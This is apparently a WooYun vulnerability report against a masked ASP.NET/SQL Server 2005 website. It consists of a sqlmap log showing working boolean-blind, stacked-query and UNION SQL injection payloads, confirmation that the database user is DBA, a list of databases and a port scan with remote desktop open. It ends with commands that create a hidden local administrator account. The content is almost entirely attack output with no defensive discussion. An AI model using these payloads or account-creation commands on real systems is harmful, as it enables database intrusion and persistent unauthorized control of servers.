WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=75 AND 9732=9732
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=75;WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=-3186 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CH
AR(113)+CHAR(117)+CHAR(104)+CHAR(81)+CHAR(102)+CHAR(103)+CHAR(105)+CHAR(103)+CHAR(83)+CHAR(79)+CHAR(
120)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-
-
---
[17:32:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[17:32:26] [INFO] testing if current user is DBA
current user is DBA:    True
[17:32:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www
.**.**.**.**'

available databases [7]:
[*] AcsDataBase
[*] hypkpmbs2012
[*] master
[*] model
[*] msdb
[*] pkpmbsv3
[*] tempdb

**.**.**.**:80 开放
**.**.**.**:8080 关闭
**.**.**.**:21 关闭
**.**.**.**:25 关闭
**.**.**.**:110 关闭
**.**.**.**:7001 关闭
**.**.**.**:9090 关闭
**.**.**.**:3389 开放

net user xi2omin9 123456 /add
net localgroup administrators xi2omin9 /add